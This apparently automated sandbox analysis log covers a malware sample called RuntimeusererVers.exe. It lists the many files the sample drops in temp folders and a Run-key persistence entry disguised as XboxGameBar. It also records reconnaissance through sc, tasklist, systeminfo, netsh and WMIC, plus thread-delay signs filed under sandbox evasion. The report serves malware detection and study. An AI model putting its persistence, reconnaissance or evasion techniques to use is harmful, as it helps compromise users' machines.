                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\yarl\_quoting_c.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_socket.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\libcrypto-1_1.dllJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\aiohttp\_http_writer.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\charset_normalizer\md.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\unicodedata.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_bz2.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_asyncio.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_bz2.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_brotli.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\multidict\_multidict.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\sqlite3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_decimal.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_hashlib.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_brotli.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_asyncio.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\charset_normalizer\md.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\select.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\libffi-8.dllJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\libcrypto-1_1.dllJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_multiprocessing.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\frozenlist\_frozenlist.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_ssl.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\vcruntime140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_uuid.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\multidict\_multidict.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\bcrypt\_bcrypt.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\vcruntime140.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\unicodedata.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_multiprocessing.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\charset_normalizer\md.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\yarl\_quoting_c.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\sqlite3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\aiohttp\_websocket.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\zstandard\backend_c.pydJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_multiprocessing.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\aiohttp\_helpers.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\pycares\_cares.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_decimal.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_ctypes.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\python3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_queue.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\select.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\pycares\_cares.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_cffi_backend.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\python3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XboxGameBarJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\systeminfo.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\netsh.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe | Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                      Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Caption, Description, ProviderName FROM Win32_LogicalDisk
                      Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Caption, Command FROM Win32_StartupCommand
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe | Window / User API: threadDelayed 545
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe | Window / User API: threadDelayed 9422
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3412
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 662
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4388
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4081
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_overlapped.pyd
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_ssl.pyd
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_sqlite3.pyd
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_lzma.pyd
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_uuid.pyd
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\pyexpat.pyd
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\bcrypt\_bcrypt.pyd
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\aiohttp\_helpers.pyd
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\aiohttp\_websocket.pyd
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_bz2.pyd
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\bcrypt\_bcrypt.pyd
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\zstandard\_cffi.pyd
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_queue.pyd
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\cryptography\hazmat\bindings\_rust.pyd
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\aiohttp\_websocket.pyd
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\frozenlist\_frozenlist.pyd
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_ctypes.pyd
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\select.pyd
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_decimal.pyd
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_socket.pyd
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\pyexpat.pyd
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\unicodedata.pyd
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\aiohttp\_http_parser.pyd
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\zstandard\_cffi.pyd
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\pyexpat.pyd
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\yarl\_quoting_c.pyd
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_cffi_backend.pyd
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\aiohttp\_http_writer.pyd
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\multidict\_multidict.pyd
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\aiohttp\_http_parser.pyd
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\zstandard\_cffi.pyd
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_hashlib.pyd
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\charset_normalizer\md__mypyc.pyd
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\frozenlist\_frozenlist.pyd
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\aiohttp\_helpers.pyd
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_hashlib.pyd
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_overlapped.pyd
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_ctypes.pyd
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_queue.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_lzma.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_socket.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_sqlite3.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_uuid.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_lzma.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_asyncio.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_cffi_backend.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\pycares\_cares.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_overlapped.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\charset_normalizer\md__mypyc.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\zstandard\backend_c.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_sqlite3.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\aiohttp\_http_parser.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\aiohttp\_http_writer.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\zstandard\backend_c.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_ssl.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_brotli.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\charset_normalizer\md__mypyc.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\yarl\_quoting_c.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_socket.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\aiohttp\_http_writer.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\charset_normalizer\md.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\unicodedata.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_bz2.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_asyncio.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_bz2.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_brotli.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\multidict\_multidict.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_decimal.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_hashlib.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_asyncio.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_brotli.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\charset_normalizer\md.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\select.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\frozenlist\_frozenlist.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_multiprocessing.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_ssl.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_uuid.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\multidict\_multidict.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\bcrypt\_bcrypt.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\unicodedata.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_multiprocessing.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\charset_normalizer\md.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\yarl\_quoting_c.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\zstandard\backend_c.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\aiohttp\_websocket.pydJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_multiprocessing.pydJump to dropped file
